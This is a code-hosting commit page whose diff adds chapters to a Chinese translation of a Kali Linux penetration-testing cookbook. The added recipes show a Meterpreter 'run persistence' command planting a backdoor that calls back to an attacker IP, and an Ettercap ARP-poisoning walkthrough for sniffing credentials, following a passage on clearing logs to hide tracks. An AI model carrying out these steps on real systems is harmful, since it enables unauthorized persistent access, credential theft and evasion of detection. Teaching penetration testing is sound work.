Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
OpenDocCN
kali-linux-cookbook-zh
提交
7dc547df
K
kali-linux-cookbook-zh
项目概览
OpenDocCN
/
kali-linux-cookbook-zh
通知
2
Star
3
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
K
kali-linux-cookbook-zh
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
7dc547df
编写于
10月 05, 2016
作者:
W
wizardforcel
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
ch7
上级
373d71bf
变更
2
隐藏空白更改
内联
并排
Showing
2 changed file
with
131 addition
and
1 deletion
+131
-1
ch7.md
ch7.md
+130
-0
ch8.md
ch8.md
+1
-1
未找到文件。
ch7.md
浏览文件 @
7dc547df
...
...
@@ -329,3 +329,133 @@
### 工作原理
这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了
`Log.clear `
命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的操作,这样只会更加更多的日志条目。
## 7.6 创建永久后门
这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。
### 准备
为了执行这个秘籍,我们需要:
+
内部网络或互联网的连接。
+
使用 Metasploit 框架的具有漏洞的主机。
### 操作步骤
让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。
1.
一旦你通过 Metasploit 和 Meterpreter shell 获得了受害者的访问权限,等待你的 Meterpreter 显示提示符。
![](img/7-6-1.jpg)
2.
下面,我们需要运行 persistence,以便创建我们的后门。我们打开帮助文件:
```
run persistence –h
```
3.
永久后门有几个选项,包括:
+ `-A`:这个选项会自动启动一个匹配的多重处理器来链接到代理端。
+ `-S`:这个选项让后门自动化启动为系统服务。
+ `-U`:这个选项让后门在用户启动系统时自动启动。
+ `-i`:这个选项设置两次尝试回复攻击者机器之间的秒数。
+ `-p`:这个选项设置攻击者机器上 Metasploit 的监听端口。
+ `-P`:这个选项设置所用的载荷。默认使用` Reverse_tcp `,并且它通常是你想使用的东西。
+ `-r`:这个选项设置攻击者机器的 IP 地址。
4.
现在,我们指定命令来建立后门:
```
run persistence –U –A –i 10 – 8090 –r 192.168.10.109
```
5.
后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。
![](img/7-6-2.jpg)
### 工作原理
这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。
## 7.7 中间人(MITM)攻击
这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在
<http://www.yahoo.com>
收发邮件时,我们使用 Ettercap 来窃听它的通信。
### 准备
为了执行这个秘籍,我们需要:
+
无线网络连接
+
连接到无线网络的机器
### 操作步骤
让我们启动 Ettercap 来开始中间人攻击。
1.
打开终端窗口并启动 Ettercap。使用
`-G`
选项加载 GUI:
```
ettercap –G
```
![](img/7-7-1.jpg)
2.
我们以打开
` Unified sniffing`
(统一嗅探)开始。你可以按下
`Shift + U`
或者访问菜单中的
` Sniff | Unified sniffing`
。
![](img/7-7-2.jpg)
3.
选择网络接口。在发起 MITM 攻击的情况中,我们应该选项我们的无线接口。
![](img/7-7-3.jpg)
4.
下面,我们打开
`Scan for hosts`
(扫描主机)。可以通过按下
`Ctrl + S`
或访问菜单栏的
` Hosts | Scan for hosts`
来完成。
![](img/7-7-4.jpg)
5.
下面,我们得到了
`Host List`
(主机列表)。你可以按下
`H`
或者访问菜单栏的
`Hosts | Host List`
。
![](img/7-7-5.jpg)
6.
我们下面需要选择或设置我们的目标。在我们的例子中,我们选择
`192.168.10.111`
作为我们的
`Target 1`
,通过选中它的 IP 地址并按下
` Add To Target 1 `
(添加到目标 1)按钮。
![](img/7-7-6.jpg)
7.
现在我们能够让 Ettercap 开始嗅探了。你可以按下
`Ctrl + W`
或访问菜单栏的
` Start | Start sniffing`
。
![](img/7-7-7.jpg)
8.
最后,我们开始进行 ARP 毒化。访问菜单栏的
`Mitm | Arp poisoning`
。
![](img/7-7-8.jpg)
9.
在出现的窗口中,选中
` Sniff remote connections`
(嗅探远程连接)的选项。
![](img/7-7-9.jpg)
0.
取决于网络环境,我们会看到信息。
![](img/7-7-10.jpg)
1.
一旦我们找到了想要找的信息(用户名和密码)。我们可以关闭 Ettercap。你可以按下
`Ctrl + E`
或访问菜单栏的
`Start | Stop sniffing`
来完成它。
![](img/7-7-11.jpg)
2.
现在我们关闭 ARP 毒化,使网络恢复正常。
![](img/7-7-12.jpg)
### 工作原理
这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。
> 你可以通过浏览<http://en.wikipedia.org/wiki/Man-in-the-middle_attack#Example_of_an_attack>来了解更多关于 MITM 的信息。
ch8.md
浏览文件 @
7dc547df
...
...
@@ -175,7 +175,7 @@ Hydra 支持许多协议,包括(但不仅限于)FTP、HTTP、HTTPS、MySQL
### 准备
这个秘籍需要局域网的
链
接。
这个秘籍需要局域网的
连
接。
### 操作步骤
...
...
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录